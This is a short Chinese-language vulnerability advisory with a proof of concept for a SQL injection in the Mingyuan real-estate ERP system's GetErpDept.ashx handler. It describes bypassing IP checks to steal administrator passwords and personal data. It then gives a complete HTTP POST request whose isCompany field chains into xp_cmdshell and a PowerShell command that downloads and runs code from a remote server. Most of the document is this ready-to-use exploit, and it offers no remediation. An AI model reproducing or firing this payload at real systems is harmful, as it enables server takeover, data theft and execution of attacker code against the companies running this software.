漏洞描述
明源地产ERP是一款专为房地产行业设计的企业资源规划(ERP)系统,旨在帮助房地产企业实现全面的信息化管理,提高运营效率和管理水平。该漏洞存在于WebService服务中,攻击者可以通过在X-Forwarded-For头中注入恶意SQL语句,绕过IP权限校验,进而获取数据库中的敏感信息(如管理员密码、用户个人信息),甚至可能通过高权限操作获取服务器系统权限。
明源地产ERP系统 /XmjdUI/Handle/GetErpDept.ashx SQL 注入漏洞
PoC代码
POST /XmjdUI/Handle/GetErpDept.ashx HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 130
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
isCompany=');exec master..xp_cmdshell "sqlps IEX ((new-object net.webclient).downloadstring('http://[REDACTED]/mXzHa'))"--